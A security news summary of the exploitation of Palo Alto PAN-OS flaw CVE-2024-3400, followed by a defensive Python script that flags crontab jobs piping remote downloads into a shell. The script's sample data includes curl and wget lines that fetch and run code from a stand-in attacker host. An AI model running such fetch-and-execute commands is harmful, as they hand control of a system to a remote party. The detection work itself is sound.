Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack

April 13, 2024 at 05:27AM

Threat actors have been actively exploiting a critical zero-day flaw (CVE-2024-3400) in Palo Alto Networks PAN-OS software, allowing unauthorized code execution. Dubbed Operation MidnightEclipse, the attack involves creating cron jobs to run commands from an external server, triggering a Python-based backdoor. The actor UTA0218 displays advanced capabilities and likely state-backing. Prompt patching is crucial.

The article highlights a critical security vulnerability, CVE-2024-3400, in Palo Alto Networks PAN-OS software, which has been exploited by threat actors in a campaign named Operation MidnightEclipse. This command injection flaw affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 configurations with the GlobalProtect gateway and device telemetry enabled, allowing unauthenticated attackers to execute arbitrary code with root privileges on the firewall. The attackers have been observed using the flaw to create a cron job that fetches and executes commands from an external server, potentially delivering a Python-based backdoor onto the firewall. Volexity tracks the threat actor as UTA0218 and suspects it is state-backed because of the resources and capabilities displayed. Organizations using Palo Alto Networks GlobalProtect firewalls are advised to monitor for signs of internal lateral movement. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, requiring federal agencies to apply patches by April 19, with Palo Alto Networks expected to release fixes by April 14. This underscores the importance of vigilance and prompt action in response to emerging threats.
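As an added defender-side example (not code from the article, Palo Alto Networks or Volexity), the following Python heuristic parses crontab entries and flags scheduled jobs that download from a remote URL and pipe the result into an interpreter, the fetch-and-execute pattern described above. The sample crontab and the `attacker.example` host are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not real indicators). The last two entries mimic
# the pattern in the article: a scheduled job that pulls commands from a
# remote host and hands them straight to a shell or Python interpreter.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /opt/agent/health_check.sh
* * * * * curl -s http://attacker.example/cmd | bash
30 1 * * * wget -qO- https://attacker.example/p.py | python3 -
"""

FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")
INTERPRETERS = re.compile(r"\b(sh|bash|dash|zsh|python[0-9.]*|perl)\b")
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into {schedule, command} records; skip comments and blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue  # malformed entry; a production scanner would log it
        entries.append({"schedule": " ".join(fields[:5]), "command": fields[5]})
    return entries


def is_fetch_and_execute(command: str) -> bool:
    """Heuristic: a remote URL is downloaded and the output is piped into an interpreter."""
    if not (FETCH_TOOLS.search(command) and REMOTE_URL.search(command)):
        return False
    if "|" not in command:
        return False
    consumer = command.rsplit("|", 1)[1]  # only the stage after the last pipe consumes the download
    return bool(INTERPRETERS.search(consumer))


def flag_suspicious(text: str) -> List[str]:
    """Return the commands of crontab entries that match the fetch-and-execute heuristic."""
    return [e["command"] for e in parse_crontab(text) if is_fetch_and_execute(e["command"])]


if __name__ == "__main__":
    for cmd in flag_suspicious(SAMPLE_CRONTAB):
        print("SUSPICIOUS:", cmd)
```

Run it against the output of `crontab -l` for each account, and treat any hit as a lead to corroborate with process and network telemetry rather than as proof on its own.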